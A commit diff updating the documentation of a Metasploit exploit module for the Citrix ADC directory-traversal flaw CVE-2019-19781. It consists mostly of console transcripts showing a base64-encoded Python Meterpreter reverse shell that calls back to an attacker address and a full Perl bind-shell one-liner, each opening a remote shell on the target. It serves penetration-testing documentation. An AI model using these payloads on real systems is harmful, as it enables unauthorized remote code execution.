adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update module doc

Browse Source
This commit is contained in:
William Vu
2020-01-13 20:51:58 -06:00
parent af4505f007
commit b4550933bb
1 changed files with 37 additions and 24 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/http/citrix_dir_traversal_rce.md
+37 -24
View File
@@ -9,25 +9,39 @@ This `/vpns/` directory is interesting because it contains Perl code. The script
A malicious attacker can execute arbitrary commands remotely by creating a corrupted xml file who use `Perl Template Toolkit` in part of payload.
```
msf5 exploit(linux/http/citrix_dir_traversal_rce) > set rhosts [IP]
rhosts => XXX.XXX.XXX.XXX
msf5 exploit(linux/http/citrix_dir_traversal_rce) > set lhost [IP]
lhost => XXX.XXX.XXX.XXX
msf5 exploit(linux/http/citrix_dir_traversal_rce) > set verbose true
verbose => true
msf5 exploit(linux/http/citrix_dir_traversal_rce) > run
[*] Started reverse TCP handler on XXX.XXX.XXX.XXX:4444
[+] The target appears to be vulnerable.
[*] Sending python/meterpreter/reverse_tcp command payload
[*] Generated command payload: import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJ1hYWC5YWFguWFhYLlhYWCcsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')))
[*] Bookmark Added.
[*] Sending stage (53755 bytes) to XXX.XXX.XXX.XXX
[*] Meterpreter session 1 opened (XXX.XXX.XXX.XXX:4444 -> XXX.XXX.XXX.XXX:42881) at 2020-01-13 12:02:41 +0400
[+] Deleted /var/tmp/netscaler/portal/templates/hBgGdPlkypbfZMvq.xml.ttc2
[+] Deleted /netscaler/portal/templates/hBgGdPlkypbfZMvq.xml
[*] Using auxiliary/scanner/http/citrix_dir_traversal as check
[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target appears to be vulnerable
[*] Yeeting cmd/unix/generic payload at 127.0.0.1:8080
[*] Generated payload: id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
meterpreter >
[!] This exploit may require manual cleanup of '/netscaler/portal/templates/mdjLHiHtIYmh.xml' on the target
[!] This exploit may require manual cleanup of '/var/tmp/netscaler/portal/templates/mdjLHiHtIYmh.xml.ttc2' on the target
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/citrix_dir_traversal_rce) > set payload cmd/unix/bind_perl
payload => cmd/unix/bind_perl
msf5 exploit(linux/http/citrix_dir_traversal_rce) > run
[*] Using auxiliary/scanner/http/citrix_dir_traversal as check
[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target appears to be vulnerable
[*] Yeeting cmd/unix/bind_perl payload at 127.0.0.1:8080
[*] Generated payload: perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};'
[!] No response to GET KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml request
[*] Started bind TCP handler against 127.0.0.1:4444
[*] Command shell session 1 opened (127.0.0.1:51106 -> 127.0.0.1:4444) at 2020-01-13 20:50:45 -0600
[+] Deleted /netscaler/portal/templates/KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml
[+] Deleted /var/tmp/netscaler/portal/templates/KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml.ttc2
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
```
## Verification Steps
@@ -43,11 +57,10 @@ meterpreter >
## Targets
```
Id Name
-- ----
0 Python (meterpreter)
1 Unix (remote shell)
2 Unix (command-line)
Id Name
-- ----
0 Python
1 Unix Command
```
## Advanced options
@@ -58,6 +71,6 @@ Override check result.
## References
1. <https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>
2. <https://www.exploit-db.com/exploits/47901>
3. <https://www.exploit-db.com/exploits/47902>
1. <https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>
2. <https://www.exploit-db.com/exploits/47901>
3. <https://www.exploit-db.com/exploits/47902>